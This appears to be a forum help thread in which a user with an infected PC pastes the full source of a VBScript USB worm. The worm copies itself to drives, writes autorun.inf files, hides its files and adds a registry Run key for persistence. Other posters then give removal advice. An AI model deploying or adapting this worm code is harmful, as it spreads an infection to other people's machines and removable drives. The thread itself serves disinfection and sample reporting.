How do I delete that particular file? I searched that windows directory, but couldn’t find the file (it’s not hidden also). I tried even the command prompt DEL command, not working
I am posting the contents of the file here, it may be useful for you people for further reference
c:\windows\iisdll.dll.vbs
'My name is Sukorn test script for bootsecter
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe IISDLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\IISDLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\IISDLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\IISDLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\IISDLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\IISDLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\IISDLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\IISDLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by MOOzilla"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.lastchaos.in.th/"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
Even though I removed the entire file and registry entry, still one problem remains
I am still not able to open my drives from My Computer by double clicking it.
If a virus is replicant (coming and coming again), you should:
Disable System Restore on Windows ME or Windows XP. System Restore cannot be disabled on Windows 9x and it’s not available in Windows 2k. After boot you can enable System Restore again.
Can you send the samples to virus@avast.com ?
You can zip and password the files… Inform a link to this thread and the password used.
You can send the files to Chest and, from there, resend to Alwil for analysis.
Thanks.
Well there would appear to be another element restoring this file.
A false positive is a file that is detected as malware but subsequently proves to be a good file. This is why deletion is never a good first option.
If you haven’t already got this software (freeware), download, install, update and run it, preferably in safe mode. Ewido, a.k.a. avg anti-spyware If using winXP.
Thanks everyone for the help. Finally the problem solved, thanks to AVG Anti-spy ware. One issue is still there,I am still not able to open my drives from My Computer by double clicking it.Right click-Open works fine. I think it’s because of that virus attack.
The Autorun.inf is superhidden. To see it, open Folder Option, choose View tab, choose Show hidden files and folders, and untick Hide protected operating system files, OK.